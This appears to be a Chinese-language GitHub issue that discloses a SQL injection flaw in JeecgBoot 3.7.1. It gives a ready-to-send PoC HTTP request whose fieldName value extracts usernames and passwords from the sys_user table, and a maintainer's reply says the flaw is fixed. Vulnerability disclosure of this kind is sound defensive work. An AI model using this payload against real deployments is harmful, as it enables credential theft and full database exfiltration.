SQL注入漏洞

[luoaz123]

版本号：jeecgboot 3.7.1

问题描述：

注入点："fieldName":"concat(username,0x3a,password)"，fieldName后面可以拼接任意查询语句以达到拿到整个数据库的数据（root权限）

Poc：
POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 288

{"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}

错误截图：

友情提示：

• 未按格式要求发帖、描述过于简单的，会被直接删掉;
• 描述问题请图文并茂，方便我们理解并快速定位问题;
• 如果使用的不是master，请说明你使用的分支;

[zhangdaiscott]

sq

[jeecgDeveloper]

已修改，下版本更新